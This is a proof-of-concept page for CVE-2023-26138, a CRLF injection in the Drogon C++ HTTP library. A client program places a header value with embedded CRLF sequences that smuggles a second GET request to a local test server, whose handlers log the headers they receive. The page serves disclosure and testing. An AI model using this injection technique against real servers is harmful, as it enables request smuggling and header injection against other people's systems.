CVE-2023-26138: CRLF Injection in [email protected]

CRLF Injection in [email protected]

#include <drogon/drogon.h>

#include <future>

#include <iostream>

using namespace drogon;

int main()

{

auto client = HttpClient::newHttpClient(“http://localhost:8081”);

auto r = HttpRequest::newHttpRequest();

r->setMethod(drogon::Get);

r->setPath(“/test1”);

r->addHeader("MyHeader", “A\r\nevil: hello1\r\n\r\nGET /test2 HTTP/1.1\r\nevil: hello2\r\n”);

client->sendRequest(

r, [](ReqResult result, const HttpResponsePtr &response) {

if (result != ReqResult::Ok)

{

std::cout

<< "error while sending request to server! result: "

<< result << std::endl;

return;

}

std::cout << “receive response!” << std::endl;

std::cout << response->getBody() << std::endl;

});

app().run();

}

#include <drogon/drogon.h>

using namespace drogon;

int main()

{

app().registerHandler(

"/test1",

[](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)> &&callback) {

auto resp = HttpResponse::newHttpResponse();

std::cout << “\ntest1 request received” << std::endl;

auto headers = req->getHeaders();

std::cout << “HEADERS” << std::endl;

for (auto const &header : headers)

{

std::cout << header.first << “=” << header.second << std::endl;

}

resp->setBody(“test1”);

callback(resp);

},

{Get});

app().registerHandler(

"/test2",

[](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)> &&callback) {

auto resp = HttpResponse::newHttpResponse();

std::cout << “\ntest2 request received” << std::endl;

auto headers = req->getHeaders();

std::cout << “HEADERS” << std::endl;

for (auto const &header : headers)

{

std::cout << header.first << “=” << header.second << std::endl;

}

resp->setBody(“test2”);

callback(resp);

},

{Get});

LOG_INFO << "Server running on 0.0.0.0:8081";

app().addListener("0.0.0.0", 8081).run();

}